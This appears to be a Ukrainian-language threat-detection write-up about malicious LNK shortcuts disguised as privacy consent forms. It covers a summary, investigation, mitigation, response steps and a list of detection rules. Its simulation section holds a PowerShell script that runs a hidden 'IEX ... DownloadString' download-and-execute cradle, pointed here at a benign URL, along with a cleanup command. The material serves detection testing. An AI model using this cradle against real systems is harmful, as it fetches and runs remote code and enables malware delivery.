Що насправді було всередині файлу ярлика, замаскованого під форму згоди на конфіденційність?
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисники розповсюджують шкідливі файли LNK, які замасковані під форми згоди на конфіденційність, щоб обманути користувачів та змусити їх відкрити ці файли. Після виконання ці ярлики запускають затемнені команди PowerShell, які завантажують та виконують додаткові завантаження за допомогою технологій без файлової компоненти. Ланцюжок атаки розроблений для крадіжки інформації та розгортання завантажувача бекдора, який допомагає зберігати доступ і стійкість.
Розслідування
Розслідування показало, що файли LNK містять затемнені коди PowerShell, які відповідають за завантаження наступних скриптів. Ці додаткові скрипти включають завантажувач, який отримує корисні навантаження з легітимних веб-сервісів, і завантажувач, який виконує їх безпосередньо в пам’яті. Зловмисник також зловживає Планувальником завдань Windows для збереження стійкості і використовує документи-заспокоєння, щоб шкідлива активність виглядала легітимною.
Мітигація
Організації повинні впроваджувати сувору перевірку розширень файлів та попереджати користувачів про файли LNK, замасковані під звичайні документи. Команди безпеки повинні ретельно моніторити активність Планувальника завдань, журнали виконання PowerShell і вихідні мережеві з’єднання. Також користувачі повинні бути навчені перевіряти як відправника, так і шлях доставки будь-якого вхідного файлу перед відкриттям.
Відповідь
Якщо ця активність виявлена, адміністратори повинні негайно перевірити підозрілі записи Планувальника завдань та незвичне створення скриптів PowerShell у каталогах з доступом користувача. Логи PowerShell повинні бути проаналізовані, а зовнішні з’єднання повинні бути простежені, особливо ті, що стосуються легітимних хмарних платформ або веб-сховищ. Повне судове розслідування має бути проведено на будь-яких виявлених шкідливих скриптах і несанкціонованому мережевому трафіку.
Хід атаки
Виявлення
Можливе виявлення інформації про систему за допомогою модуля Wmi Powershell (через powershell)
Перегляд
Можливі індикатори затемнення PowerShell (через powershell)
Перегляд
Виконання шкідливого файлу LNK, що призводить до зовнішнього завантаження та з’єднань [Мережеве з’єднання Windows]
Перегляд
Виконання та стійкість шкідливого файлу LNK через Планувальник завдань [Створення процесу Windows]
Перегляд
Виконання шкідливого файлу LNK із затемненим PowerShell [Windows Powershell]
Перегляд
Виконання симуляції
Попередня умова: має бути пройдено перевірка телеметрії та базової лінії перед польотом.
Обґрунтування: Цей розділ викладає точне виконання техніки супротивника (TTP), розроблене для запуску правила виявлення. Команди та наратив повинні безпосередньо відображати ідентифіковані TTP та націлені на генерування саме тієї телеметрії, що очікується детекційною логікою. Абстрактні або невідповідні приклади призведуть до помилкової діагностики.
-
Опис та команди атаки: Зловмисник намагається встановити початковий доступ і завантажити шкідливий вантаж другого етапу. Щоб уникнути виявлення простими сканерами файлів, вони використовують файл LNK (ярлик). Цей файл LNK складається для виконання
powershell.exeу прихованому вікні. Команда, передана PowerShell, використовуєInvoke-ExpressionandDownloadStringдля завантаження скрипту з віддаленого URL. Це імітує реальні атаки типу “Living-off-the-Land” (LotL), де використовуються легітимні двійкові файли для виконання шкідливих дій, з метою обійти традиційні антивірусні засоби, базовані на сигнатурах. -
Скрипт регресійного тестування:
# 1. Визначте цільовий URL (використовуючи нешкідливий сайт для тестування) $url = "https://www.google.com" # 2. Створіть строку шкідливого завантаження PowerShell # Ця строка призначена для запуску виявлення 'DownloadString' та 'Invoke-Expression' $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')" # 3. Створіть вміст демонстративного файлу LNK (Симулюється) # У реальній атаці це був би бінарний .lnk файл. # Тут ми виконання команди безпосередньо, щоб забезпечити генерацію логу ScriptBlock для валідації. Write-Host "[+] Симуляція шкідливого виконання PowerShell через навантаження LNK..." powershell.exe -WindowStyle Hidden -Command $payload Write-Host "[+] Команда симуляції виконана. Проверте Ідентифікатор події 4104." -
Команди очищення:
# Видаліть будь-які артефакти, якщо були створені файли Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue Write-Host "[+] Очищення завершено."